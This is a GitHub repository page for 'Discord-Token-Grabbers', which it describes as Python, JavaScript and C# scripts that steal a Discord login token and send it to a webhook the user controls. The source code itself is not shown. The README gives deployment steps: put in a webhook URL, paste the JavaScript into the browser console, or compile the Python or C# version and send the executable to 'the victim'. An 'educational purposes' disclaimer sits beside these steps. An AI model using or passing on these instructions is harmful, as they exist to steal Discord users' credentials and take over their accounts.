Skip to content

MRXdebug/Discord-Token-Grabbers

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Discord Token Grabbers on Python, Javascript and C#

Simple scripts that grabs the token and sends it through a webhook

  • NOTE: Only made for educational purposes!

Usage

Put your Discord webhook url

  • Python
WEBHOOK_URL = "HERE"
  • Javascript
var webhook = "HERE"
  • C#
string WEBHOOK_URL = "HERE";

In case of using Javascript

  • Press ctrl + shift + i
  • Go to "console"
  • Paste the code and press enter

In case of using Python or C#

  • First you need to compile your code
  • Then send the executable file to the victim

Tested on:

  • Windos 10
  • Chrome

About

Discord Token Loggers Samples

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published